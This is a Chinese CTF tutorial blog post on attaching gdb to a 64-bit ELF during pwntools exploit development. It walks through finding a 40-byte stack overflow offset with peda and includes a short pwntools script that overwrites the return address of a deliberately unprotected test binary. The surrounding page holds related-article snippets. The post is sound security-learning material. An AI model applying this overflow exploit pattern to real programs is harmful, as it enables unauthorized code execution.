【Pwn】使用gdb附加调试64位程序

已于 2023-02-26 21:30:07 修改
阅读量1.3k 收藏 2
点赞数
分类专栏: CTF 文章标签: linux
于 2022-05-17 19:55:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52553215/article/details/124545614
版权

elf,是Linux的主要可执行文件格式

可通过 pwntools的gdb模块 完成 elf文件的动态调试工作

其中最常用的是attach函数,在指定process之后可以attach上去调试,配合proc模块就可以得到对应进程的pid

pwntools开发脚本时如何调试:

1.使用proc.pidof(p)函数,将被测函数的pid打印出来

2.用gdb attach上去调试即可

例:

编译:各种保护都不加(64位)

打开两个终端:一个用来调试,另一个用来运行python脚本。

1终端:

可以看一眼汇编代码:objdump -d -M intel ./text

调试:gdb text

(这里用的peda)

pattern create 200

复制随机生成的字符串

r

粘贴字符串

回车

发现在ret处暂停,发现了错误

找到栈的最低地址处前四个字节,这里即为将要跳转的地方

pattern offset 四个字节

看到偏移为40

写出exp:

from pwn import *

context(os = 'linux',arch = 'amd64',log_level = 'debug')        //实时获取debug,可注释

p = process("./test")

print "pid" + str(proc.pidof(p))

offset = 40

payload = offset * 'a' + p64(0xxxxxx)

#pause()        //pause要在sendline前面,用于调试

p.sendline(payload)

p.interactive()

终端2:

python exp.py

成功

若不成功

将pause取消注释,进行调试        //这里用正确的exp为例

将gdb附加到进程上面

终端2:

python exp.py

//进程已创建,pid也打印出来了

终端1:

gdb -attach 打印出的pid

终端2:

回车        //继续运行,发送process

终端1:

n        //一直向下单步执行

直到看到call getline函数

执行完此函数,看到rcx中出现了一堆a,说明已经获取到payload了

继续向下单步执行

看到gets函数执行完毕,几个寄存器全被覆盖为a

直到运行完ret,发现返回到了exploit函数

成功

轻闲一号机
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[PWN][进阶篇]使用GDB附加调试64位程序
网络安全知识分享
03-22 7592
使用GDB附加调试64位程序 pwntools开发脚本时如何调试: 1、使用proc.pidof§函数先将被测函数的PID打印出来 2、 用GDB Attach上去调试即可 本次实验的代码如下:
python pwntools库 简介 主要功能有 网络 进程 文件 编解码 elf 汇编 调试
whatday的专栏
11-29 3065
Pwntools是一个工具包,使选手们在CTF期间的尽可能容易的编写EXP,并使EXP尽可能的容易阅读。有些代码每个人都写过无数次,而且每个人都有自己的方法。Pwntools的目标是以半标准的方式提供所有这些,这样你就可以停止复制粘贴相同的代码,而是使用更多稍微清晰的包装器,如pack或p32甚至。除了对日常的功能进行方便的包装外,它还提供了一套非常丰富的IO管道,将所有你曾经执行过的IO封装在一个统一的界面中。从本地攻击切换到远程攻击,或者通过SSH进行本地攻击,都只是修改一行代码的工作。
探索黑客艺术:Pwngdb - 强大的GDB扩展框架
最新发布
gitblog_00021的博客
05-16 356
探索黑客艺术:Pwngdb - 强大的GDB扩展框架 项目地址:https://gitcode.com/scwuaptx/Pwngdb 项目介绍 Pwngdb是一个专为漏洞利用(pwn)而设计的GDB增强工具。它集成了pwndbg和其他实用功能,旨在提供一个更高效、更直观的调试环境,让你在安全研究和逆向工程中如虎添翼。无论你是初学者还是经验丰富的开发者,Pwngdb都将帮助你快速定位问题,理解内存...
PWNGDB调试工具的基本使用
qq_29174265的博客
07-06 1580
编译时,编译器为了输出执行更快的代码,所以不带有debuginfo,无法使用GDB进行调试,应使用。: 监视变量i,当i的值发生变化时停下(watchpoint),也相当于打断点。指定大小 起始内存地址,即查看起始内存地址上指定大小的内存里的值。: 给存储在address地址的变量类型为type的变量赋值。显示某个地址处开始的16进制内容,如果有符号表会加载符号表。是一个正整数,表示需要显示的内存单元的个数。开始的3个字节的值,也可以是。按十六进制格式显示变量。按十六进制格式显示变量。
Linux系统下gdb调试
qq_42856609的博客
03-22 960
2、gdb用法介绍(1)生成带有调试信息的可运行程序,命令如下:g++ -g main.cpp -o main //生成带有调试信息的可运行程序main,编译参数-g结果如下:ls -lh # 以人类可读的方式显示当前目录中的文件和目录大小没有调试信息的结果如下:有调试信息的结果如下:以看出,没有调试信息的会提示:No debugging symbols found in…,有调试信息的会提示Reading symbols from …。
pwntoolsgdb使用
weixin_30820077的博客
06-04 823
pwntoolsgdb使用 下断后请加 debug() r.send(payload) r.interactive() def debug(addr = '0x080485B8'): raw_input('debug:') gdb.attach(r, "b *" + addr) debug() r.send(payload) r.interactive() 必须加 r...
PWNPwndbg
weixin_52553215的博客
11-23 1万+
一、gdbpwndbg GDB——The GNU Project Debugger.是Linux下面的一款强大的基于命令行的软件调试器。 GDB的所有操作都基于命令行进行,有别于windows上的各种调试器。 GDB调试目标主要是带源代码的软件,即进行开发调试。若想要进行逆向工程调试,则需要GDB插件来提供额外的功能。pwndbg专门针对pwn调试添加了额外的功能。 二、调试 三、跟踪代码 四、打印 五、pwndbg高级功能 ...
gdb调试方式展示
02-17
Linux 包含了一个叫 gdb 的 GNU 调试程序. gdb 是一个用来调试 C 和 C++ 程序的强力调试器. 它使你能在程序运行时观察程序的内部结构和内存的使用情况. 以下是 gdb 所提供的一些功能: 它使你能监视你程序中变量的值...
pwndra:Ghidra的与pwnCTF相关的实用程序的集合
05-08
彭德拉Ghidra的与pwn / CTF相关的实用程序的集合实用工具替换常量该实用程序将尝试用其人类可读的对等替换函数中的已知常量。注释系统调用该实用程序将尝试查找和识别系统调用(和参数)。 反编译器视图中的注释 ...
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 我什至开发了一些脚本和工具来...
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
64位调试工具
12-25
64位调试反编译工具。替代OD的存在!图形化调试、汉化版。
gdb for windows
04-04
gdb for windows版本,亲测win7 64位完美运行。 使用时需要将压缩包中的两个文件解压到系统 path环境变量设置的某个目录中。
browser_pwn:浏览器pwn,现在主要工作
03-22
在V8_pwn中,d8经常被用来复现和调试可能导致安全漏洞的JavaScript脚本。 browser-pwn: 浏览器Pwn涵盖了所有针对浏览器的攻击技术,包括但不限于V8_pwn和JSC_pwn。这涉及到对浏览器组件(如渲染引擎、插件、...
解决运行在kali环境下的pwntools无法给gdb.attach()时候传递gdbscript的问题
ZL_1618的博客
12-28 967
在kali里面是二进制文件,但在ubuntu里面是脚本文件,而且最后启动的还是gnome-terminal,于是我的思路就来了,原来x-terminal-emulator只是一个引用而已,并不是一个实际的伪终端程序。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。提示在倒入gdbscript文件的时候提示,No such file or directory,但是我去目录下看了看,确实是有这个文件的。
Linuxpwn从入门到放弃,pwn从入门到放弃第三章——gdb的基本使用教程
weixin_29338423的博客
05-14 1690
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?考完试了,来填坑gdb在做题中经常用到,熟练掌握gdb会事半功倍我们继续用第二章中的程序来讲解gdb使用程序直接拖进vmware中,因为我们下的vmware专用版本的kali,所以已经安装好vmware tool之类的,直接拖进去或者复制粘贴进去就可以了打开terminal,cd到Desktop先给程序加可执行权限,...
pwntools 无法在deepin 下gdb.attach的问题
pwd_3的博客
08-09 1765
pwntools 无法在deepin 下gdb.attach的问题之前一直无法调试,试了网上说的由于没有进程跟踪权限而以root方式执行也无法解决加上 context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']因为deepin默认的终端不是gnome,而pwntools 默认的调试终端是gnome,而deepin又刚好没有gnome-term
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
安装pwndbg和pwngdb
04-05
作为AI助手,我无法直接在您的计算机上安装软件,但我可以向您提供一些安装指南。 安装pwndbg: 1. 打开终端并输入以下命令:git clone https://github.com/pwndbg/pwndbg 2. 进入下载的文件夹:cd pwndbg 3. 安装pwndbg:./setup.sh 安装pwngdb: 1. 打开终端并输入以下命令:git clone https://github.com/scwuaptx/Pwngdb 2. 进入下载的文件夹:cd Pwngdb 3. 将Pwngdb的设置复制到您的主目录:cp ./pwngdb ~/.pwngdb 4. 在您的主目录中创建.gdbinit文件:touch ~/.gdbinit 5. 将以下代码添加到.gdbinit文件中:source ~/.pwngdb/pwngdb.py 安装完成后,您可以使用pwndbg和pwngdb调试您的二进制文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值